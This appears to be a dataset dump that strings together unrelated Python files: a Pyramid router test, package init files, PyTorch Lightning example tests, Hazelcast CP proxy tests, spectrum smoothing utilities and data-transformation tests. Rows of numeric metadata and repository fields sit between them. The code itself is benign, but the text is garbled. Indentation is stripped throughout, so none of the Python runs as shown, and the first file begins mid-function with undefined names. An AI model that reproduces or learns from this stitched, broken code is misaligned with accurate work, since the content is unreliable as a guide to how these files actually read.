from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
result = []
def dummy_policy(environ, router):
ctx = router.request_context(environ)
ctx.begin()
result.append(get_current_request())
ctx.end()
result.append(get_current_request())
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/test_path').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
self.assertEqual(result[0].path_info, '/test_path')
self.assertEqual(result[1], None)
class DummyPredicate(object):
def __call__(self, info, request):
return True
def text(self):
return 'predicate'
class DummyContext:
pass
class DummyView:
def __init__(self, response, raise_exception=None):
self.response = response
self.raise_exception = raise_exception
def __call__(self, context, request):
self.context = context
self.request = request
if self.raise_exception is not None:
raise self.raise_exception
return self.response
class DummyRootFactory:
def __init__(self, root):
self.root = root
def __call__(self, environ):
return self.root
class DummyStartResponse:
status = ()
headers = ()
def __call__(self, status, headers):
self.status = status
self.headers = headers
from pyramid.interfaces import IResponse
from zope.interface import implementer
@implementer(IResponse)
class DummyResponse(object):
headerlist = ()
app_iter = ()
environ = None
def __init__(self, status='200 OK'):
self.status = status
def __call__(self, environ, start_response):
self.environ = environ
start_response(self.status, self.headerlist)
return self.app_iter
class DummyAuthenticationPolicy:
pass
class DummyLogger:
def __init__(self):
self.messages = []
def info(self, msg):
self.messages.append(msg)
warn = info
debug = info
def exc_raised(exc, func, *arg, **kw):
try:
func(*arg, **kw)
except exc as e:
return e
else:
raise AssertionError('%s not raised' % exc) # pragma: no cover
| 44.212615 | 80 | 0.66578 | 5,776 | 62,384 | 6.990824 | 0.059037 | 0.041135 | 0.058768 | 0.075559 | 0.815721 | 0.776319 | 0.750737 | 0.719161 | 0.69759 | 0.683846 | 0 | 0.003464 | 0.250273 | 62,384 | 1,410 | 81 | 44.243972 | 0.85987 | 0.003623 | 0 | 0.70687 | 0 | 0 | 0.036121 | 0.009445 | 0 | 0 | 0 | 0 | 0.110687 | 1 | 0.092366 | false | 0.029771 | 0.138168 | 0.00916 | 0.299237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
60a98ad188a68f01ec581e6c0e915babfcba0adf | 131 | py | Python | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 3 | 2016-03-15T17:27:31.000Z | 2019-02-25T16:46:05.000Z | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 1 | 2018-05-24T21:57:08.000Z | 2018-05-24T21:57:08.000Z | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 2 | 2016-07-08T10:14:59.000Z | 2019-02-25T16:46:08.000Z | from IOUtil import imgpath2list, getFilepathParts, loadImage, mkpath
__all__ = [imgpath2list, getFilepathParts, loadImage, mkpath] | 43.666667 | 68 | 0.832061 | 12 | 131 | 8.75 | 0.666667 | 0.533333 | 0.704762 | 0.819048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0.099237 | 131 | 3 | 69 | 43.666667 | 0.872881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
60f10a637e583b97d4873a96b2f110f604401415 | 3,855 | py | Python | pl_examples/test_examples.py | Palzer/pytorch-lightning | 886702a1af442f33625693a9ba33c669f9fe9535 | [
"Apache-2.0"
] | null | null | null | pl_examples/test_examples.py | Palzer/pytorch-lightning | 886702a1af442f33625693a9ba33c669f9fe9535 | [
"Apache-2.0"
] | 1 | 2021-01-20T09:05:55.000Z | 2021-01-20T09:05:55.000Z | pl_examples/test_examples.py | zippeurfou/pytorch-lightning | 4018237c309b7d9d6978da73132003615341e04a | [
"Apache-2.0"
] | null | null | null | import platform
from unittest import mock
import pytest
import torch
try:
from nvidia.dali import ops, types, pipeline, plugin
except (ImportError, ModuleNotFoundError):
DALI_AVAILABLE = False
else:
DALI_AVAILABLE = True
dp_16_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
--gpus 2 \
--distributed_backend dp \
--precision 16 \
"""
cpu_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
"""
ddp_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
--gpus 2 \
--precision 16 \
"""
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_mnist(cli_args):
# from pl_examples.basic_examples.mnist import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_image_classifier(cli_args):
# from pl_examples.basic_examples.image_classifier import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_autoencoder(cli_args):
# from pl_examples.basic_examples.autoencoder import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_mnist(cli_args):
# from pl_examples.basic_examples.mnist import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_image_classifier(cli_args):
# from pl_examples.basic_examples.image_classifier import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_autoencoder(cli_args):
# from pl_examples.basic_examples.autoencoder import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
#
@pytest.mark.parametrize('cli_args', [cpu_args])
def test_examples_cpu(cli_args):
from pl_examples.basic_examples.mnist import cli_main as mnist_cli
from pl_examples.basic_examples.image_classifier import cli_main as ic_cli
from pl_examples.basic_examples.autoencoder import cli_main as ae_cli
for cli_cmd in [mnist_cli, ic_cli, ae_cli]:
with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
cli_cmd()
@pytest.mark.skipif(not DALI_AVAILABLE, reason="Nvidia DALI required")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
@pytest.mark.skipif(platform.system() != 'Linux', reason='Only applies to Linux platform.')
@pytest.mark.parametrize('cli_args', [cpu_args])
def test_examples_mnist_dali(cli_args):
from pl_examples.basic_examples.mnist_dali import cli_main
with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
cli_main()
| 32.125 | 94 | 0.715953 | 555 | 3,855 | 4.702703 | 0.156757 | 0.064368 | 0.05364 | 0.072797 | 0.81341 | 0.81341 | 0.811111 | 0.811111 | 0.796169 | 0.776628 | 0 | 0.010495 | 0.13489 | 3,855 | 119 | 95 | 32.394958 | 0.772114 | 0.555123 | 0 | 0.469388 | 0 | 0 | 0.291892 | 0.05045 | 0 | 0 | 0 | 0.008403 | 0 | 1 | 0.040816 | false | 0 | 0.204082 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
60fcac8c565f52772e31b0515722896754228d53 | 131 | py | Python | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | """
Created on 12:13, May. 23rd, 2021
Author: fassial
Filename: __init__.py
"""
# test_neurons model
from .test_neurons import *
| 13.1 | 33 | 0.717557 | 19 | 131 | 4.631579 | 0.894737 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.160305 | 131 | 9 | 34 | 14.555556 | 0.709091 | 0.694656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
714f8a8d7e5693da634704e423d7dee3ad4c692f | 168 | py | Python | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 350 | 2020-08-06T13:49:11.000Z | 2022-03-24T08:53:59.000Z | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 12 | 2020-08-07T02:21:58.000Z | 2021-05-20T11:50:44.000Z | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 35 | 2020-08-06T16:53:40.000Z | 2021-12-17T06:01:09.000Z | from .buffers import Buffer
from .segments import Segment
from .utils import flatten_batch, lambda_returns
__all__ = [flatten_batch, lambda_returns, Buffer, Segment]
| 24 | 58 | 0.815476 | 22 | 168 | 5.863636 | 0.545455 | 0.186047 | 0.27907 | 0.387597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 168 | 6 | 59 | 28 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7151e1a6be4abb6476e27e48f9a4112280588d02 | 65 | py | Python | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
] | 727 | 2015-07-13T20:32:55.000Z | 2022-03-31T11:55:34.000Z | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
] | 335 | 2015-07-22T12:28:35.000Z | 2022-02-24T11:53:12.000Z | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
] | 155 | 2015-07-22T08:53:19.000Z | 2022-03-30T10:59:22.000Z | from enum import IntEnum
class SteamIntEnum(IntEnum):
pass
| 10.833333 | 28 | 0.753846 | 8 | 65 | 6.125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 65 | 5 | 29 | 13 | 0.942308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
71871e0292e1d8b802fe63c2ba6b5ae65d4c0b43 | 47 | py | Python | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | from .lofti import *
from .loftitools import *
| 15.666667 | 25 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0d1b295fde3d2e37f133fdb10dee9c9a476d7bf | 1,627 | py | Python | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 98 | 2015-12-08T14:26:27.000Z | 2022-03-23T17:44:11.000Z | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 396 | 2016-02-23T11:07:55.000Z | 2022-03-31T14:26:34.000Z | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 62 | 2015-12-09T11:20:53.000Z | 2022-01-28T01:30:54.000Z | import unittest
from hazelcast.cp import _without_default_group_name, _get_object_name_for_proxy
class CPProxyManagerTest(unittest.TestCase):
def test_without_default_group_name(self):
self.assertEqual("test", _without_default_group_name("test@default"))
self.assertEqual("test", _without_default_group_name("test@DEFAULT"))
self.assertEqual("test@custom", _without_default_group_name("test@custom"))
def test_without_default_group_name_with_multiple_group_names(self):
with self.assertRaises(AssertionError):
_without_default_group_name("test@default@@default")
def test_without_default_group_name_with_metadata_group_name(self):
with self.assertRaises(AssertionError):
_without_default_group_name("test@METADATA")
with self.assertRaises(AssertionError):
_without_default_group_name("test@metadata")
def test_get_object_name_for_proxy(self):
self.assertEqual("test", _get_object_name_for_proxy("test@default"))
self.assertEqual("test", _get_object_name_for_proxy("test@custom"))
def test_get_object_name_for_proxy_empty_object_name(self):
with self.assertRaises(AssertionError):
_get_object_name_for_proxy("@default")
with self.assertRaises(AssertionError):
_get_object_name_for_proxy(" @default")
def test_get_object_name_for_proxy_empty_proxy_name(self):
with self.assertRaises(AssertionError):
_get_object_name_for_proxy("test@")
with self.assertRaises(AssertionError):
_get_object_name_for_proxy("test@ ")
| 40.675 | 83 | 0.744929 | 197 | 1,627 | 5.624365 | 0.142132 | 0.08935 | 0.17148 | 0.207581 | 0.844765 | 0.795126 | 0.758123 | 0.67148 | 0.611913 | 0.532491 | 0 | 0 | 0.16595 | 1,627 | 39 | 84 | 41.717949 | 0.816507 | 0 | 0 | 0.392857 | 0 | 0 | 0.098955 | 0.012907 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1cdc5158ed6a2d1184788efd4464973510c51b48 | 1,378 | py | Python | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | null | null | null | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | 3 | 2022-03-08T10:25:39.000Z | 2022-03-30T10:47:28.000Z | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | null | null | null | from numpy import minimum,fft,pad
from scipy.signal import windows
def snip(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[p:-p]
a2 = (x[:(-2 * p)] + x[(2 * p):]) * 0.5
x[p:-p] = minimum(a2,a1)
return x
def convolve(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,(n,n),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[n * 2:] / sum(kernel)
def snip2d(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[:,p:-p]
a2 = (x[:,:(-2 * p)] + x[:,(2 * p):]) * 0.5
x[:,p:-p] = minimum(a2,a1)
return x
def convolve2d(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,((0,0),(0,0),(n,n)),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[:,n * 2:] / sum(kernel)
def snip3d(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[:,:,p:-p]
a2 = (x[:,:,:(-2 * p)] + x[:,:,(2 * p):]) * 0.5
x[:,:,p:-p] = minimum(a2,a1)
return x
def convolve3d(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,((0,0),(0,0),(n,n)),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[:,:,n * 2:] / sum(kernel)
| 20.878788 | 55 | 0.472424 | 259 | 1,378 | 2.478764 | 0.173745 | 0.056075 | 0.028037 | 0.018692 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0 | 0.063126 | 0.275762 | 1,378 | 65 | 56 | 21.2 | 0.58016 | 0 | 0 | 0.522727 | 0 | 0 | 0.008708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.045455 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1cec17f8e4df0441d775d8b108bf5f7cb115fd1c | 140 | py | Python | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 1 | 2022-01-10T01:20:21.000Z | 2022-01-10T01:20:21.000Z | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 8 | 2021-10-01T12:54:27.000Z | 2022-03-24T12:22:40.000Z | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | null | null | null | from . import snapshot_pb2_grpc as snapshot_grpc
from . import snapshot_pb2 as snapshot
__all__ = [
"snapshot_grpc",
"snapshot",
]
| 17.5 | 48 | 0.728571 | 18 | 140 | 5.166667 | 0.388889 | 0.215054 | 0.387097 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017699 | 0.192857 | 140 | 7 | 49 | 20 | 0.80531 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1c15fd4eed9557a7866a22680e8f03270cbc0a57 | 9,903 | py | Python | tests/runner/test_string_manipulations.py | OasisLMF/OEDtransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 1 | 2022-03-18T14:53:27.000Z | 2022-03-18T14:53:27.000Z | tests/runner/test_string_manipulations.py | OasisLMF/OpenDataTransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 25 | 2021-08-05T16:17:24.000Z | 2022-03-29T16:28:35.000Z | tests/runner/test_string_manipulations.py | OasisLMF/OEDtransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 1 | 2022-01-21T14:39:20.000Z | 2022-01-21T14:39:20.000Z | from hypothesis import given, settings
from converter.config import Config
from converter.mapping.base import ColumnConversion, TransformationEntry
from converter.types.notset import NotSet
from ..connector.fakes import FakeConnector
from ..mapping.fakes import make_simple_mapping
from .stategies import runners
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="replace(a, 'oo', 'aa')",
)
],
"d": [
TransformationEntry(
transformation=(
r"replace(a + ' ' + b, re'oo (.)', '\1\1')"
),
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa a", "d": "faa fbb"},
{"c": "far a", "d": "far a far b"},
{"c": "baa a", "d": "baa bbb"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="replace('foo', 'oo', 'aa')",
)
],
"d": [
TransformationEntry(
transformation=(r"replace('foo, bee', re'o{2}', 'aa')"),
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace_with_multiple_pairs(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="""
replace(
a + ' ' + b,
'foo', 'faa',
'boo', 'bam'
)
""",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa a faa b"},
{"c": "far a far b"},
{"c": "bam a bam b"},
{"c": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_match(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "oo a", "b": "oo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="match(a, 'foo a')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when="match(a, re'oo.*')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": NotSet},
{"c": NotSet, "d": "oo a oo b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_match_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="match('foo', 'foo')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when="match('foo a', re'.*oo.*')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": "foo a foo b"},
{"c": "far a", "d": "far a far b"},
{"c": "boo a", "d": "boo a boo b"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_search(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="search(a, 'far')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when=r"search(a + ' ' + b, re'a\s\w+oo')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": NotSet, "d": "foo a foo b"},
{"c": "far a", "d": NotSet},
{"c": NotSet, "d": "boo a boo b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_search_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="search('a foo b', 'foo')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when=r"search('foo a bar', re'oo.\w')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": "foo a foo b"},
{"c": "far a", "d": "far a far b"},
{"c": "boo a", "d": "boo a boo b"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_lookups_str_and_non_str(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ', 'bar', a, 5, b, 0)",
)
],
},
types={"b": ColumnConversion(type="int")},
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "bar, foo a, 5, 1, 0"},
{"c": "bar, far a, 5, 2, 0"},
{"c": "bar, boo a, 5, 3, 0"},
{"c": "bar, bar a, 5, 4, 0"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_nothing(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ')",
)
]
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": ""},
{"c": ""},
{"c": ""},
{"c": ""},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_single_element(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
